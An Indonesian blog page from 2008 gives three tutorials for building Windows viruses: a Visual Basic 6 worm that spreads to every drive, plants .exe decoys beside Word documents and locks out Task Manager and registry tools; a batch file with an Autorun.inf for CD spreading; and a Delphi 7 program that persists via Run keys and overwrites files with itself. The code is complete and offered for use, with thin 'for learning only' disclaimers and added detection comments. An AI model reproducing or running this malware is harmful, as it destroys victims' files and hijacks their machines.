Membuat Virus HalooMom

12 Juli, 2008

Peringatan

Artikel ini hanya untuk pembelajaran saja; penyalahgunaan artikel ini bukan tanggung jawab penulis.

Sebelum menulis kode di bawah ini, pertama-tama program aplikasi Visual Basic 6 harus sudah terinstalasi di komputer Anda. Setelah itu buka project baru dan masukkan sebuah modul di dalam project Anda. Tapi ingat setelah Anda memberikan sebuah modul, hilangkan form1 Anda. Setelah itu pada Properties Project ganti startup aplikasi Anda dari Form1 ke Sub Main. Setelah itu ketik kode di bawah ini.

Code:
Private Declare Function GetDriveType Lib “kernel32″ _
Alias “GetDriveTypeA” (ByVal nDrive As String) As Long
Private Declare Function GetWindowsDirectory Lib “kernel32″ _
Alias “GetWindowsDirectoryA” (ByVal ipBuffer As String, ByVal nSize As Long) As Long

Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260

Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type

Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type

Private Declare Function FindFirstFile Lib “kernel32″ Alias “FindFirstFileA” _
(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib “kernel32″ Alias “FindNextFileA” _
(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Private Declare Function FindClose Lib “kernel32″ (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib “kernel32″ Alias “CopyFileA” _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long) As Long
Private pbMessage As Boolean

' Translates the numeric code returned by the GetDriveType API into a label.
' Drive:   a drive letter, "X:" or "X:\"; the two shorter forms are extended to a
'          root path before the API call (the assignment is made on the parameter itself).
' Returns: one of the label strings below; every code outside 2-6 yields the
'          "doesn't exist" label, which kodepengganda uses to skip a drive letter.
Private Function DriveType(Drive As String) As String
Dim sAns As String, lAns As Long
If Len(Drive) = 1 Then Drive = Drive & “:\”
If Len(Drive) = 2 And Right$(Drive, 1) = “:” Then Drive = Drive & “\”
lAns = GetDriveType(Drive)
Select Case lAns
Case 2
sAns = “Removable Drive”
Case 3
sAns = “Fixed Drive”
Case 4
sAns = “Remote Drive”
Case 5
sAns = “CD-ROM”
Case 6
sAns = “RAM Disk”
Case Else
sAns = “Drive Doesn’t Exist”
End Select
DriveType = sAns
End Function

' Replication step: walks the drive letters A-Z (character codes 65-90) and, for
' every letter DriveType does not report as missing, copies the running
' executable to the root of that drive under the fixed name HalooMom.exe.
' Detection: the same HalooMom.exe (identical size and hash) in the root of
' several volumes, removable and mapped drives included, is a host indicator.
' Copy failures are ignored (On Error Resume Next), so a volume that is
' read-only or not writable by the current user is skipped without any message.
' x and sDrives are declared but not used in this procedure.
Private Sub kodepengganda()
Dim ictr As Integer
Dim sDrive As String
Dim x As Byte
ReDim sDrives(0) As String
For ictr = 65 To 90
sDrive = Chr(ictr) & “:\”
If DriveType(sDrive) <> “Drive Doesn’t Exist” Then
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, sDrive & “HalooMom.exe”
End If
Next
End Sub

' Drops a copy of the running executable into the Windows directory (path
' obtained from GetWindowsDirectory) under the name Readme.exe.
' Detection: an unexpected Readme.exe directly under the Windows directory.
' Where that directory is writable only by administrators, a standard-user
' session makes this copy fail; the failure is ignored (On Error Resume Next).
Private Sub kopikewindows()
Dim Buffer As String * 255
Dim x As Long
' x receives the number of characters GetWindowsDirectory wrote into Buffer.
x = GetWindowsDirectory(Buffer, 255)
On Error Resume Next
FileCopy App.Path & “\” & App.EXEName & “.exe”, Left(Buffer, x) & “\Readme.exe”
End Sub

' Writes a registry value through the WScript.Shell COM object (RegWrite with
' no explicit type argument).
' Folder: full registry path of the value to write.
' Value:  the string data to store.
' Failures (COM object unavailable, access denied) are ignored because of
' On Error Resume Next. Detection: registry writes issued by a non-script
' process that instantiates WScript.Shell.
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value
End Sub

' Same as CreateKey, but stores the data as a REG_DWORD.
' Folder: full registry path of the value to write.
' Value:  the integer data to store.
' Failures are ignored (On Error Resume Next).
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject(“wscript.shell”)
b.RegWrite Folder, Value, “REG_DWORD”
End Sub

' Writes the registry values this sample uses for autostart and for hindering
' inspection and cleanup. Every path below is a host indicator. The writes go
' through CreateKey/CreateIntegerKey, which ignore failures; the HKLM writes
' only succeed when the process may write to HKEY_LOCAL_MACHINE.
Sub kodepertahanan()
' Explorer: remove the Folder Options menu entry and hide known file extensions.
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt”, 1
' Values behind the "show / do not show hidden files" choice in Folder Options.
' NOTE(review): the effect of these four numbers depends on the Windows version;
' compare with a known-clean machine and treat an unexpected change as an indicator.
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DefaultValue”, 1
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue”, 2
CreateIntegerKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DefaultValue”, 2
' Per-user policy values: Display control panel, Task Manager, Start-menu Run.
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 1
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1
' titik is prepended and appended to every string value written below
' (presumably a quote character - confirm).
Dim titik As String
titik = “”"”
' Autostart: two Run values pointing at the dropped copies, with hard-coded C: paths.
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\IKernel”, titik & “C:\Windows\Readme.exe” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Run\HalooMom”, titik & “C:\HalooMom.exe” & titik
' Logon notice caption and text.
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption”, titik & “www.jombang-city.net” & titik
CreateKey “HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext”, titik & “Ibu adalah orang yang melahirkan kita jadi jangan pernah durhaka kepadanya” & titik
' Per-user policy value for registry editing tools. With DisableTaskMgr and
' NoRun also set for the same user, remediation is usually done from another
' account, through Group Policy, or by editing the user's hive offline.
CreateIntegerKey “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”, 1
End Sub

' Enumerates the files under Path that match Pattern and, next to each one,
' creates a copy of C:\Windows\Readme.exe named <original file name>.exe.
' Path:      directory to scan (a trailing backslash is added by AddBackSlash).
' SubFolder: when True, the procedure calls itself for every subdirectory
'            except "." and "..".
' Pattern:   wildcard passed to FindFirstFile; defaults to all files.
' The matched file itself is not opened, changed or removed by this procedure;
' CopyFile is called with bFailIfExists = 1, so an existing <name>.exe is left alone.
' Detection: files with a doubled extension (for example name.doc.exe, given the
' pattern Manipulasi passes) that all share one size and hash, sitting beside
' documents of the same base name. With extensions hidden in Explorer the two
' entries look alike, so compare by file type or from a command prompt.
Public Sub GetFiles(Path As String, SubFolder As Boolean, Optional Pattern As String = “*.*”)
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(Path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
' First pass: entries matching the pattern that are not directories.
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile “C:\Windows\Readme.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”, 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile “C:\Windows\Readme.exe”, fPath & StripNulls(WFD.cFileName) & “.exe”, 1
End If
Wend
End If
' Second pass: all entries, keeping only directories, to recurse into them.
If SubFolder Then
hFile = FindFirstFile(fPath & “*.*”, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And _
StripNulls(WFD.cFileName) <> “.” And StripNulls(WFD.cFileName) <> “..” Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub

' Returns the part of f that precedes its first null character (Chr$(0)).
' Used on the fixed-length cFileName field of WIN32_FIND_DATA.
Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) – 1)
End Function

' Returns S with exactly one trailing backslash appended when it has none.
' An empty S yields a lone backslash.
Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> “\” Then
AddBackSlash = S & “\”
Else
AddBackSlash = S
End If
Else
AddBackSlash = “\”
End If
End Function

' Runs GetFiles recursively over the fixed drive letters C, D, E and F with the
' pattern *.DOC. The scope of the search is therefore Word documents on those
' four letters; triage of an affected host can start from document folders on
' these volumes.
Sub Manipulasi()
GetFiles “C:”, True, “*.DOC”
GetFiles “D:”, True, “*.DOC”
GetFiles “E:”, True, “*.DOC”
GetFiles “F:”, True, “*.DOC”
End Sub

' Program entry point (the article sets the project's startup object to Sub Main).
' Order of operations: copy to drive roots, copy to the Windows directory,
' create the .exe companions beside documents, write the registry values, then
' hand over to Ulang, which calls Main again. Dropped files and registry values
' are therefore written again while the process is alive, so remediation has to
' end the process before removing them.
Sub Main()
kodepengganda
kopikewindows
Manipulasi
kodepertahanan
Call Ulang
End Sub

' Calls Main again; Main ends by calling this procedure, so the two keep
' invoking each other.
Sub Ulang()
Call Main
End Sub


Buat Virus Sederhana dengan Notepad

12 Juli, 2008

virus ini efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus (setahu saya…..)

ni ane dapet dari hasil baca-baca “HELP”-nya windows Xp…trus ane modif sendiri…

note: “HANYA BEKERJA PADA WINDOWS XP”

caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… Laughing ) script di bawah ini:

@echo off
rem Template batch file; the parenthesised Indonesian text in each line is the
rem author's placeholder note, not part of a command.
rem What the lines do: copy one bitmap and one executable into the system drive
rem root, WINDOWS and WINDOWS\system32; set the Winlogon logon-notice caption and
rem text; set the wallpaper for the current user and for .DEFAULT; add a value
rem under the HKLM Run key that points at the copied executable; write a window
rem colour value.
rem Host indicators: reg.exe started by a batch file from removable media, new
rem values under the Run key and under Winlogon LegalNoticeCaption/LegalNoticeText,
rem and unexpected .bmp/.exe files in the three target directories.
rem The HKEY_LOCAL_MACHINE writes and the copies into WINDOWS need a session
rem that is allowed to write there.
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe %systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d %systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar pembuat).bmp /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d #000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f

- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:

; AutoRun descriptor: open= names the program Windows starts when the medium is
; inserted, on systems where AutoRun is enabled for that drive type.
; Mitigation: disable AutoRun by policy (NoDriveTypeAutoRun) and treat an
; Autorun.inf whose open= entry points at a script as suspicious.
[autorun]
open=nama_file.bat

- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya

Catatan:

1. Ini hanya untuk pembelajaran saja

2. Kami tidak bertanggung jawab atas penyalahgunaan artikel di atas

3. Selamat bersenang-senang


Membuat Virus dengan Delphi 7

12 Juli, 2008

Ini kode untuk membuat virus dengan Delphi 7, ketik kode di bawah ini atau bisa kopi paste. Dan ingat kode di bawah hanya untuk pembelajaran saja, dan kami tidak bertanggung jawab atas penyalahgunaan kode di bawah ini:

unit Unit1;

interface
{Deklarasi ShellApi Yang Digunakan}
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;

type
{ Main form of the sample. It declares two timers and three event handlers:
  FormCreate runs the drop-and-persist routine, and Timer1Timer/Timer2Timer
  enable each other in turn, which makes Timer1Timer's copy of that routine
  run repeatedly. The timer intervals and the event wiring are not set in this
  unit (presumably in the .dfm - confirm). }
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);

private
{ Private declarations }
public
{ Public declarations }
end;

var
Form1: TForm1;

implementation

{$R *.dfm}
{{$R MySoundRes.RES}

{ Startup routine of the sample (presumably wired to the form's OnCreate in the
  .dfm - confirm). In order: hides the main form, drops copies of the running
  executable into the Windows and system directories, marks one copy hidden,
  writes a policy value and two autostart values to the registry, then
  overwrites and renames the entries FindNext returns in the current directory.
  Every step sits in try/except with an empty handler, so a failure shows no error.
  Host indicators visible below: the runfold directory under the system
  directory, the listed .exe names under the Windows directory, and the '.NET.'
  value under Run and RunOnce in HKEY_LOCAL_MACHINE. }
procedure TForm1.FormCreate(Sender: TObject);

{Variable declarations}
var
regis: TRegistry;
APath: string;
MySearch: TSearchRec;
dir : string;
{i : integer;}
{x : integer;}
{F:TextFile;}
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{keep the main form invisible: the process runs without a window}
Application.ShowMainForm := false;
{drop copies of the running executable; the last CopyFile argument is true,
 so a copy that already exists is not replaced}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{set the hidden attribute on the copy in runfold; a listing that includes
 hidden files still shows it}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{writes the DisableTaskMgr value under HKCU Software\Microsoft\Windows\
 CurrentVersion\Policies\System, creating the keys when absent
 (author's note: "disable Task Manager")}
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;

regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{autostart: a value named .NET. under the HKLM Run key pointing at the copy in
 runfold; monitoring writes to Run and RunOnce catches this step}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{the same value under RunOnce}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{author's note: "infect files". CopyFile is called with false as its last
 argument, so the content of each entry FindNext returns in the current
 directory is replaced by this executable. The original data is lost;
 recovery depends on backups.}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
copyFile (pchar(application.ExeName),pchar(APath+’\’+MySearch.Name),false);
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{author's note: "change the infected files". Appends .exe to the name of each
 entry FindNext returns; the second rename removes that suffix again from the
 running executable's own name (presumably in case the loop renamed it - confirm).
 Indicator: a directory whose entries all end in .exe and share one size and hash.}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
renamefile (pchar(APath+’\’+MySearch.Name),pchar(APath+’\’+MySearch.Name+’.exe’));
renamefile (pchar(application.ExeName+’.exe’),pchar(application.ExeName));
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{ Timer handler that repeats the drop-and-persist steps of FormCreate: the
  copies under the Windows and system directories, the hidden attribute, the
  DisableTaskMgr value and the Run/RunOnce values. It then asks the shell to
  open www.imm.or.id, sends a string to mciSendString, enables Timer2 and
  disables itself; Timer2Timer switches it back on.
  Consequence for remediation: while the process runs, removed files and
  registry values are written again on the next tick, so the process has to be
  ended first. The timer interval is not set in this unit. }
procedure TForm1.Timer1Timer(Sender: TObject);
{author's note: "keep watching"}
{variable declarations}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{re-create the runfold directory and the dropped copies; CopyFile is called
 with true, so copies that still exist are left as they are}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{set the hidden attribute on the copy in runfold again}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{writes the DisableTaskMgr value under HKCU ...\Policies\System again
 (author's note: "disable Task Manager")}
begin
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{write the .NET. autostart value under the HKLM Run key again}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{and the same value under RunOnce}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{visible side effect: a shell 'open' request for www.imm.or.id on every tick;
 repeated unrequested browser launches to this address are a user-visible symptom}
try
ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL);
mciSendString(’dadan cakep deh’, nil, 0, handle);
except
end;
{hand over to Timer2, which enables this timer again}
timer2.Enabled:= true;
timer1.Enabled:= false;
end;

{ Second half of the timer pair: sends a string to mciSendString, enables
  Timer1 and disables itself, so Timer1Timer runs again on its next tick. }
procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString(’dadan memang cakep’, nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
end;
end.